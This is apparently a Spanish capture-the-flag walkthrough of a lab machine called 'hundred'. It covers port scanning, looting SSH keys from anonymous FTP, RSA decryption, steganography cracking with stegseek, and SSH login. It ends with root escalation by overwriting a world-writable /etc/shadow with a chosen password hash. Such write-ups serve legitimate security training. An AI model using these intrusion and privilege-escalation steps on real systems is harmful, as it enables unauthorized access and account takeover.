Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.146
❯ nmap -sCV -p21,22,80 -oN 02-targeted.txt 192.168.1.146
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-04 17:51 -04
Nmap scan report for 192.168.1.146
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxrwxrwx 1 0 0 435 Aug 02 2021 id_rsa [NSE: writeable]
| -rwxrwxrwx 1 1000 1000 1679 Aug 02 2021 id_rsa.pem [NSE: writeable]
| -rwxrwxrwx 1 1000 1000 451 Aug 02 2021 id_rsa.pub [NSE: writeable]
|_-rwxrwxrwx 1 0 0 187 Aug 02 2021 users.txt [NSE: writeable]
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelEn el FTP anónimo hay claves (id_rsa.pem) y una lista de usuarios. El código del sitio menciona un .enc y la clave usada:
key: h4ckb1tu5.enc;
<!-- l4nr3n, nice dir.-->Descargamos el .enc y lo desciframos con la clave RSA:
❯ wget http://192.168.1.146/h4ckb1tu5.enc
❯ openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out decoded_message.txt
❯ cat decoded_message.txt
/softyhackb4el7dshelldreddEnumeramos ese subdirectorio y descargamos un logo.jpg que crackeamos con stegseek usando el listado de usuarios como wordlist:
❯ gobuster dir -u 'http://192.168.1.146/softyhackb4el7dshelldredd/' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/common.txt -x php,txt,html,jpg,jpeg,png,gif -r
...
/id_rsa (Status: 200) [Size: 1876]
...
❯ wget http://192.168.1.146/logo.jpg
❯ stegseek -wl users.txt logo.jpg
[i] Found passphrase: "cromiphi"
[i] Original filename: "toyou.txt".
[i] Extracting to "logo.jpg.out".
❯ cat logo.jpg.out
d4t4s3c#1Usamos la id_rsa con esa passphrase para entrar como hmv:
❯ ssh hmv@192.168.1.146 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
...
hmv@hundred:~$Obtenemos la primera flag. Verificando permisos de archivos críticos, vemos que /etc/shadow es escribible (Writable Critical Files Privesc):
hmv@hundred:/tmp/pwned$ ls -l /etc/shadow
-rwxrwx-wx 1 root shadow 963 Aug 2 2021 /etc/shadowGeneramos un hash y reemplazamos la contraseña de root:
hmv@hundred:/tmp/pwned$ openssl passwd 1234
wIFt/vsmQ5d5.
hmv@hundred:/tmp/pwned$ echo "root:wIFt/vsmQ5d5.:18893:0:99999:7:::" > /etc/shadow
hmv@hundred:/tmp/pwned$ su root
Password: 1234
root@hundred:/tmp/pwned#Obtenemos nuestra flag.
Fin.